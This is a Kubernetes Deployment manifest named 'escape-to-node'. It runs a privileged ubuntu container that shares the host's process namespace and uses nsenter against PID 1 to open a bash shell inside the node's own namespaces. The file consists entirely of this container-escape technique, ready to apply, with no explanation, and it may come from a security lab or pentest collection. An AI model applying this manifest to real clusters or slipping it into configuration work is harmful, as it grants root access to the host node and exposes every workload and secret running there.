apiVersion: apps/v1
kind: Deployment
metadata:
  name: escape-to-node
  labels:
    app: escape-to-node
spec:
  replicas: 1
  selector:
    matchLabels:
      app: escape-to-node
  template:
    metadata:
      labels:
        app: escape-to-node
    spec:
      hostPID: true
      containers:
      - name: ubuntu
        image: ubuntu
        tty: true
        securityContext:
          privileged: true
        command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]